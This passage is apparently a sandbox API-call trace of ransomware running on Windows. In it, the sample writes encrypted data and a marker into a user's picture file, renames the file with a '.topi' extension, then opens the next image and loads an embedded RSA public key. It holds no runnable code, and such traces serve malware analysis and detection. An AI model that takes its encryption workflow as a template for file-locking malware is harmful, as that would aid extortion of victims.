Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.785] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18fb0) returned 0x9a06a00 [0096.786] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02cf0 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02d38 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b08 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b50 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.786] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b50 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4b38 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.788] GetCurrentThreadId () returned 0x8c4 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8730 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.788] GetCurrentThreadId () returned 0x8c4 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b50 [0096.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b20 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b68 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b38 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b38 | out: hHeap=0x680000) returned 1 [0096.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b50 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b20 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02d38 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.792] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x18fa9, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x18fa9, lpOverlapped=0x0) returned 1 [0096.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.793] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18fae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.793] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.793] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.793] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.793] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.794] CloseHandle (hObject=0x6a8) returned 1 [0096.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0096.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0096.799] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WjYIWF0mU2KcO6Nbd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\wjyiwf0mu2kco6nbd.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\WjYIWF0mU2KcO6Nbd.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\wjyiwf0mu2kco6nbd.bmp.topi")) returned 1 [0096.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.800] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.801] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd386be70, ftCreationTime.dwHighDateTime=0x1d5bc01, ftLastAccessTime.dwLowDateTime=0x54212550, ftLastAccessTime.dwHighDateTime=0x1d5b5c9, ftLastWriteTime.dwLowDateTime=0x54212550, ftLastWriteTime.dwHighDateTime=0x1d5b5c9, nFileSizeHigh=0x0, nFileSizeLow=0x17ef3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x0jUCkTsXZflk5KCqd.jpg", cAlternateFileName="X0JUCK~1.JPG")) returned 1 [0096.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.802] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\x0jUCkTsXZflk5KCqd.jpg") returned=".jpg" [0096.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\x0jUCkTsXZflk5KCqd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\x0jucktsxzflk5kcqd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.802] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=98035) returned 1 [0096.802] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.805] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x17ecd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.805] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.806] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.806] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x17ef3, lpOverlapped=0x0) returned 1 [0096.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.807] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.807] CryptAcquireContextW (in: phProv=0x9ccfa50, 